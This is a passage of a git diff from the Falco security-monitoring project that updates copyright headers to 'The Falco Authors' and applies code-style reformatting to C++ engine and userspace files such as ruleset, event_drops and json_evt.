- enum index_type { + enum index_type + { IDX_KEY, IDX_NUMERIC }; // A struct describing a single filtercheck field ("ka.user") - struct field_info { + struct field_info + { std::string m_name; std::string m_desc; @@ -91,7 +91,8 @@ public: }; // A struct describing a group of filtercheck fields ("ka") - struct check_info { + struct check_info + { std::string m_name; std::string m_desc; @@ -101,10 +102,10 @@ public: json_event_filter_check(); virtual ~json_event_filter_check(); - virtual int32_t parse_field_name(const char* str, bool alloc_state, bool needed_for_filtering); - void add_filter_value(const char* str, uint32_t len, uint32_t i = 0 ); + virtual int32_t parse_field_name(const char *str, bool alloc_state, bool needed_for_filtering); + void add_filter_value(const char *str, uint32_t len, uint32_t i = 0); bool compare(gen_event *evt); - virtual uint8_t* extract(gen_event *evt, uint32_t* len, bool sanitize_strings = true); + virtual uint8_t *extract(gen_event *evt, uint32_t *len, bool sanitize_strings = true); // Simpler version that returns a string std::string extract(json_event *evt); @@ -124,7 +125,6 @@ public: virtual json_event_filter_check *allocate_new() = 0; protected: - static std::string def_format(const nlohmann::json &j, std::string &field, std::string &idx); static std::string json_as_string(const nlohmann::json &j); @@ -133,15 +133,16 @@ protected: // jevt.value[/user/username]. This struct represents one of // those aliases. - typedef std::function format_t; + typedef std::function format_t; - struct alias { + struct alias + { // The variants allow for brace-initialization either // with just the pointer or with both the pointer and // a format function. alias(); - alias(nlohmann::json::json_pointer ptr); - alias(nlohmann::json::json_pointer ptr, format_t format); + alias(nlohmann::json::json_pointer ptr); + alias(nlohmann::json::json_pointer ptr, format_t format); virtual ~alias(); // A json pointer used to extract a referenced value @@ -182,7 +183,6 @@ protected: format_t m_format; private: - std::vector m_values; }; @@ -192,14 +192,13 @@ public: jevt_filter_check(); virtual ~jevt_filter_check(); - int32_t parse_field_name(const char* str, bool alloc_state, bool needed_for_filtering); + int32_t parse_field_name(const char *str, bool alloc_state, bool needed_for_filtering); - virtual uint8_t* extract(gen_event *evt, uint32_t* len, bool sanitize_strings = true); + virtual uint8_t *extract(gen_event *evt, uint32_t *len, bool sanitize_strings = true); json_event_filter_check *allocate_new(); private: - static std::string s_jevt_time_field; static std::string s_jevt_time_iso_8601_field; static std::string s_jevt_rawtime_field; @@ -252,7 +251,6 @@ public: std::set m_tags; }; - class json_event_filter_factory : public gen_event_filter_factory { public: @@ -271,7 +269,6 @@ public: private: std::list> m_defined_checks; std::list m_info; - }; // Unlike the other classes, this does not inherit from a shared class @@ -289,12 +286,11 @@ public: std::string tojson(json_event *ev); std::map tomap(json_event *ev); - void resolve_tokens(json_event *ev, std::list> &resolved); + void resolve_tokens(json_event *ev, std::list> &resolved); private: void parse_format(); - // A format token is either a combination of a filtercheck // name (ka.value) and filtercheck object as key, or an empty // key and a NULL filtercheck object, combined with a value ( @@ -320,6 +316,3 @@ private: // All the filterchecks required to resolve tokens in the format string json_event_filter_factory &m_json_factory; }; - - - diff --git a/userspace/engine/lpeg.h b/userspace/engine/lpeg.h index d4184e6b..88601b00 100644 --- a/userspace/engine/lpeg.h +++ b/userspace/engine/lpeg.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/engine/lua/compiler.lua b/userspace/engine/lua/compiler.lua index 595eec97..b5a11904 100644 --- a/userspace/engine/lua/compiler.lua +++ b/userspace/engine/lua/compiler.lua @@ -1,6 +1,4 @@ --- Copyright (C) 2016-2018 Draios Inc dba Sysdig. --- --- This file is part of falco. +-- Copyright (C) 2019 The Falco Authors. -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. diff --git a/userspace/engine/lua/parser-smoke.sh b/userspace/engine/lua/parser-smoke.sh index c157b509..5de240f7 100755 --- a/userspace/engine/lua/parser-smoke.sh +++ b/userspace/engine/lua/parser-smoke.sh @@ -1,6 +1,5 @@ -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/userspace/engine/lua/parser.lua b/userspace/engine/lua/parser.lua index bd96b4d4..ab244565 100644 --- a/userspace/engine/lua/parser.lua +++ b/userspace/engine/lua/parser.lua @@ -1,6 +1,4 @@ --- Copyright (C) 2016-2018 Draios Inc dba Sysdig. --- --- This file is part of falco. +-- Copyright (C) 2019 The Falco Authors. -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. diff --git a/userspace/engine/lua/rule_loader.lua b/userspace/engine/lua/rule_loader.lua index f7e9fa57..948388f8 100644 --- a/userspace/engine/lua/rule_loader.lua +++ b/userspace/engine/lua/rule_loader.lua @@ -1,6 +1,4 @@ --- Copyright (C) 2016-2018 Draios Inc dba Sysdig. --- --- This file is part of falco. +-- Copyright (C) 2019 The Falco Authors. -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. diff --git a/userspace/engine/lua/sinsp_rule_utils.lua b/userspace/engine/lua/sinsp_rule_utils.lua index b25c3392..cb80f689 100644 --- a/userspace/engine/lua/sinsp_rule_utils.lua +++ b/userspace/engine/lua/sinsp_rule_utils.lua @@ -1,6 +1,4 @@ --- Copyright (C) 2018 Draios inc. --- --- This file is part of falco. +-- Copyright (C) 2019 The Falco Authors. -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. diff --git a/userspace/engine/lyaml.h b/userspace/engine/lyaml.h index 9d2ada0f..570b8e32 100644 --- a/userspace/engine/lyaml.h +++ b/userspace/engine/lyaml.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/engine/rules.cpp b/userspace/engine/rules.cpp index e0691269..80f6e15e 100644 --- a/userspace/engine/rules.cpp +++ b/userspace/engine/rules.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include "rules.h" diff --git a/userspace/engine/rules.h b/userspace/engine/rules.h index 02037b17..67513547 100644 --- a/userspace/engine/rules.h +++ b/userspace/engine/rules.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/engine/ruleset.cpp b/userspace/engine/ruleset.cpp index 57ed0ef0..5d7f9af0 100644 --- a/userspace/engine/ruleset.cpp +++ b/userspace/engine/ruleset.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2018 Draios inc. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include "ruleset.h" @@ -40,8 +37,8 @@ falco_ruleset::~falco_ruleset() m_filters.clear(); } -falco_ruleset::ruleset_filters::ruleset_filters() - : m_num_filters(0) +falco_ruleset::ruleset_filters::ruleset_filters(): + m_num_filters(0) { } @@ -69,7 +66,7 @@ void falco_ruleset::ruleset_filters::add_filter(filter_wrapper *wrap) added = true; if(m_filter_by_event_tag.size() <= etag) { - m_filter_by_event_tag.resize(etag+1); + m_filter_by_event_tag.resize(etag + 1); } if(!m_filter_by_event_tag[etag]) @@ -109,7 +106,7 @@ void falco_ruleset::ruleset_filters::remove_filter(filter_wrapper *wrap) removed = true; l->erase(it, - l->end()); + l->end()); if(l->size() == 0) { @@ -142,11 +139,12 @@ bool falco_ruleset::ruleset_filters::run(gen_event *evt, uint32_t etag) list *filters = m_filter_by_event_tag[etag]; - if (!filters) { + if(!filters) + { return false; } - for (auto &wrap : *filters) + for(auto &wrap : *filters) { if(wrap->filter->run(evt)) { @@ -181,13 +179,13 @@ void falco_ruleset::add(string &name, for(auto &etag : event_tags) { - wrap->event_tags.resize(etag+1); + wrap->event_tags.resize(etag + 1); wrap->event_tags[etag] = true; } - m_filters.insert(pair(name, wrap)); + m_filters.insert(pair(name, wrap)); - for(const auto &tag: tags) + for(const auto &tag : tags) { auto it = m_filter_by_event_tag.lower_bound(tag); @@ -195,7 +193,7 @@ void falco_ruleset::add(string &name, it->first != tag) { it = m_filter_by_event_tag.emplace_hint(it, - make_pair(tag, list())); + make_pair(tag, list())); } it->second.push_back(wrap); @@ -204,7 +202,7 @@ void falco_ruleset::add(string &name, void falco_ruleset::enable(const string &substring, bool enabled, uint16_t ruleset) { - while (m_rulesets.size() < (size_t) ruleset + 1) + while(m_rulesets.size() < (size_t)ruleset + 1) { m_rulesets.push_back(new ruleset_filters()); } @@ -215,7 +213,7 @@ void falco_ruleset::enable(const string &substring, bool enabled, uint16_t rules matches = (substring == "" || (val.first.find(substring) != string::npos)); - if (matches) + if(matches) { if(enabled) { @@ -231,7 +229,7 @@ void falco_ruleset::enable(const string &substring, bool enabled, uint16_t rules void falco_ruleset::enable_tags(const set &tags, bool enabled, uint16_t ruleset) { - while (m_rulesets.size() < (size_t) ruleset + 1) + while(m_rulesets.size() < (size_t)ruleset + 1) { m_rulesets.push_back(new ruleset_filters()); } @@ -254,7 +252,7 @@ void falco_ruleset::enable_tags(const set &tags, bool enabled, uint16_t uint64_t falco_ruleset::num_rules_for_ruleset(uint16_t ruleset) { - while (m_rulesets.size() < (size_t) ruleset + 1) + while(m_rulesets.size() < (size_t)ruleset + 1) { m_rulesets.push_back(new ruleset_filters()); } @@ -264,7 +262,7 @@ uint64_t falco_ruleset::num_rules_for_ruleset(uint16_t ruleset) bool falco_ruleset::run(gen_event *evt, uint32_t etag, uint16_t ruleset) { - if(m_rulesets.size() < (size_t) ruleset + 1) + if(m_rulesets.size() < (size_t)ruleset + 1) { return false; } @@ -274,7 +272,7 @@ bool falco_ruleset::run(gen_event *evt, uint32_t etag, uint16_t ruleset) void falco_ruleset::event_tags_for_ruleset(vector &evttypes, uint16_t ruleset) { - if(m_rulesets.size() < (size_t) ruleset + 1) + if(m_rulesets.size() < (size_t)ruleset + 1) { return; } @@ -294,7 +292,7 @@ void falco_sinsp_ruleset::add(string &name, set &evttypes, set &syscalls, set &tags, - sinsp_filter* filter) + sinsp_filter *filter) { set event_tags; @@ -302,28 +300,28 @@ void falco_sinsp_ruleset::add(string &name, { // If no evttypes or syscalls are specified, the filter is // enabled for all evttypes/syscalls. - for(uint32_t i=0; i < PPM_EVENT_MAX; i++) + for(uint32_t i = 0; i < PPM_EVENT_MAX; i++) { evttypes.insert(i); } - for(uint32_t i=0; i < PPM_SC_MAX; i++) + for(uint32_t i = 0; i < PPM_SC_MAX; i++) { syscalls.insert(i); } } - for(auto evttype: evttypes) + for(auto evttype : evttypes) { event_tags.insert(evttype_to_event_tag(evttype)); } - for(auto syscallid: syscalls) + for(auto syscallid : syscalls) { event_tags.insert(syscall_to_event_tag(syscallid)); } - falco_ruleset::add(name, tags, event_tags, (gen_event_filter *) filter); + falco_ruleset::add(name, tags, event_tags, (gen_event_filter *)filter); } bool falco_sinsp_ruleset::run(sinsp_evt *evt, uint16_t ruleset) @@ -344,7 +342,7 @@ bool falco_sinsp_ruleset::run(sinsp_evt *evt, uint16_t ruleset) etag = evttype_to_event_tag(etype); } - return falco_ruleset::run((gen_event*) evt, etag, ruleset); + return falco_ruleset::run((gen_event *)evt, etag, ruleset); } void falco_sinsp_ruleset::evttypes_for_ruleset(vector &evttypes, uint16_t ruleset) @@ -353,7 +351,7 @@ void falco_sinsp_ruleset::evttypes_for_ruleset(vector &evttypes, uint16_t event_tags_for_ruleset(event_tags, ruleset); - evttypes.assign(PPM_EVENT_MAX+1, false); + evttypes.assign(PPM_EVENT_MAX + 1, false); for(uint32_t etype = 0; etype < PPM_EVENT_MAX; etype++) { @@ -372,7 +370,7 @@ void falco_sinsp_ruleset::syscalls_for_ruleset(vector &syscalls, uint16_t event_tags_for_ruleset(event_tags, ruleset); - syscalls.assign(PPM_EVENT_MAX+1, false); + syscalls.assign(PPM_EVENT_MAX + 1, false); for(uint32_t syscallid = 0; syscallid < PPM_SC_MAX; syscallid++) { @@ -392,6 +390,5 @@ uint32_t falco_sinsp_ruleset::evttype_to_event_tag(uint32_t evttype) uint32_t falco_sinsp_ruleset::syscall_to_event_tag(uint32_t syscallid) { - return PPM_EVENT_MAX+1+syscallid; + return PPM_EVENT_MAX + 1 + syscallid; } - diff --git a/userspace/engine/ruleset.h b/userspace/engine/ruleset.h index 0a9f1a59..353a66f9 100644 --- a/userspace/engine/ruleset.h +++ b/userspace/engine/ruleset.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2018 Draios inc. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/engine/token_bucket.cpp b/userspace/engine/token_bucket.cpp index 0cc749a7..0d676dc4 100644 --- a/userspace/engine/token_bucket.cpp +++ b/userspace/engine/token_bucket.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/engine/token_bucket.h b/userspace/engine/token_bucket.h index 731a38c7..4feb95dd 100644 --- a/userspace/engine/token_bucket.h +++ b/userspace/engine/token_bucket.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/falco/CMakeLists.txt b/userspace/falco/CMakeLists.txt index b95b7944..914d0fd8 100644 --- a/userspace/falco/CMakeLists.txt +++ b/userspace/falco/CMakeLists.txt @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/userspace/falco/config_falco.h.in b/userspace/falco/config_falco.h.in index 43e2e42c..82d99ff2 100644 --- a/userspace/falco/config_falco.h.in +++ b/userspace/falco/config_falco.h.in @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/falco/configuration.cpp b/userspace/falco/configuration.cpp index ae871690..95b36b62 100644 --- a/userspace/falco/configuration.cpp +++ b/userspace/falco/configuration.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/falco/configuration.h b/userspace/falco/configuration.h index 51cd3b65..ee39ee54 100644 --- a/userspace/falco/configuration.h +++ b/userspace/falco/configuration.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/falco/event_drops.cpp b/userspace/falco/event_drops.cpp index 8bd242c0..5218c061 100644 --- a/userspace/falco/event_drops.cpp +++ b/userspace/falco/event_drops.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2013-2019 Draios Inc dba Sysdig. - -This file is part of sysdig. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,18 +12,17 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include "event_drops.h" -syscall_evt_drop_mgr::syscall_evt_drop_mgr() - : m_num_syscall_evt_drops(0), - m_num_actions(0), - m_inspector(NULL), - m_outputs(NULL), - m_next_check_ts(0), - m_simulate_drops(false) +syscall_evt_drop_mgr::syscall_evt_drop_mgr(): + m_num_syscall_evt_drops(0), + m_num_actions(0), + m_inspector(NULL), + m_outputs(NULL), + m_next_check_ts(0), + m_simulate_drops(false) { } @@ -116,7 +113,7 @@ bool syscall_evt_drop_mgr::perform_actions(uint64_t now, scap_stats &delta, bool std::string rule = "Falco internal: syscall event drop"; std::string msg = rule + ". " + std::to_string(delta.n_drops) + " system calls dropped in last second."; - std::map output_fields; + std::map output_fields; output_fields["n_evts"] = std::to_string(delta.n_evts); output_fields["n_drops"] = std::to_string(delta.n_drops); diff --git a/userspace/falco/event_drops.h b/userspace/falco/event_drops.h index e70a10d4..c02a64e6 100644 --- a/userspace/falco/event_drops.h +++ b/userspace/falco/event_drops.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once @@ -29,7 +26,6 @@ limitations under the License. class syscall_evt_drop_mgr { public: - // The possible actions that this class can take upon // detecting a syscall event drop. enum action @@ -60,7 +56,6 @@ public: void print_stats(); protected: - // Perform all configured actions. bool perform_actions(uint64_t now, scap_stats &delta, bool bpf_enabled); @@ -74,5 +69,3 @@ protected: scap_stats m_last_stats; bool m_simulate_drops; }; - - diff --git a/userspace/falco/falco.cpp b/userspace/falco/falco.cpp index 469f51e2..4cf46f5e 100644 --- a/userspace/falco/falco.cpp +++ b/userspace/falco/falco.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #define __STDC_FORMAT_MACROS diff --git a/userspace/falco/falco_output_queue.h b/userspace/falco/falco_output_queue.h index 101fa1cf..2e57001a 100644 --- a/userspace/falco/falco_output_queue.h +++ b/userspace/falco/falco_output_queue.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/falco_outputs.cpp b/userspace/falco/falco_outputs.cpp index 955d4a99..8ccee2cc 100644 --- a/userspace/falco/falco_outputs.cpp +++ b/userspace/falco/falco_outputs.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/falco/falco_outputs.h b/userspace/falco/falco_outputs.h index fb670551..012dfa25 100644 --- a/userspace/falco/falco_outputs.h +++ b/userspace/falco/falco_outputs.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/falco/grpc_context.cpp b/userspace/falco/grpc_context.cpp index 7c4ed8a8..60e47f19 100644 --- a/userspace/falco/grpc_context.cpp +++ b/userspace/falco/grpc_context.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/grpc_context.h b/userspace/falco/grpc_context.h index b086792d..9823fffa 100644 --- a/userspace/falco/grpc_context.h +++ b/userspace/falco/grpc_context.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/grpc_server.cpp b/userspace/falco/grpc_server.cpp index 4aac8991..34607fba 100644 --- a/userspace/falco/grpc_server.cpp +++ b/userspace/falco/grpc_server.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/grpc_server.h b/userspace/falco/grpc_server.h index 5d2c2d52..9b868322 100644 --- a/userspace/falco/grpc_server.h +++ b/userspace/falco/grpc_server.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/grpc_server_impl.cpp b/userspace/falco/grpc_server_impl.cpp index d4712290..1e172bf0 100644 --- a/userspace/falco/grpc_server_impl.cpp +++ b/userspace/falco/grpc_server_impl.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/grpc_server_impl.h b/userspace/falco/grpc_server_impl.h index 0c7adc7f..fffae63b 100644 --- a/userspace/falco/grpc_server_impl.h +++ b/userspace/falco/grpc_server_impl.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/logger.cpp b/userspace/falco/logger.cpp index aef22569..770d1929 100644 --- a/userspace/falco/logger.cpp +++ b/userspace/falco/logger.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/falco/logger.h b/userspace/falco/logger.h index 7fb78082..82ea6867 100644 --- a/userspace/falco/logger.h +++ b/userspace/falco/logger.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/falco/lua/output.lua b/userspace/falco/lua/output.lua index bbec5268..4e096e3f 100644 --- a/userspace/falco/lua/output.lua +++ b/userspace/falco/lua/output.lua @@ -1,6 +1,4 @@ --- Copyright (C) 2016-2018 Draios Inc dba Sysdig. --- --- This file is part of falco. +-- Copyright (C) 2019 The Falco Authors. -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. diff --git a/userspace/falco/lua/test.lua b/userspace/falco/lua/test.lua index 6fbe752a..b0769af6 100644 --- a/userspace/falco/lua/test.lua +++ b/userspace/falco/lua/test.lua @@ -1,6 +1,4 @@ --- Copyright (C) 2016-2018 Draios Inc dba Sysdig. --- --- This file is part of falco. +-- Copyright (C) 2019 The Falco Authors. -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. diff --git a/userspace/falco/statsfilewriter.cpp b/userspace/falco/statsfilewriter.cpp index 98ca8ff5..dcb7260a 100644 --- a/userspace/falco/statsfilewriter.cpp +++ b/userspace/falco/statsfilewriter.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/falco/statsfilewriter.h b/userspace/falco/statsfilewriter.h index dc35b0f6..c4a1d1e9 100644 --- a/userspace/falco/statsfilewriter.h +++ b/userspace/falco/statsfilewriter.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/falco/utils.cpp b/userspace/falco/utils.cpp index 344539cb..6400729f 100644 --- a/userspace/falco/utils.cpp +++ b/userspace/falco/utils.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/utils.h b/userspace/falco/utils.h index cf466cd1..30d6bd15 100644 --- a/userspace/falco/utils.h +++ b/userspace/falco/utils.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 The Falco Authors - -This file is part of falco. +Copyright (C) 2019 The Falco Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/falco/webserver.cpp b/userspace/falco/webserver.cpp index 1a6d14fa..f4a511a9 100644 --- a/userspace/falco/webserver.cpp +++ b/userspace/falco/webserver.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2018 Draios inc. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include @@ -27,8 +24,8 @@ limitations under the License. using json = nlohmann::json; using namespace std; 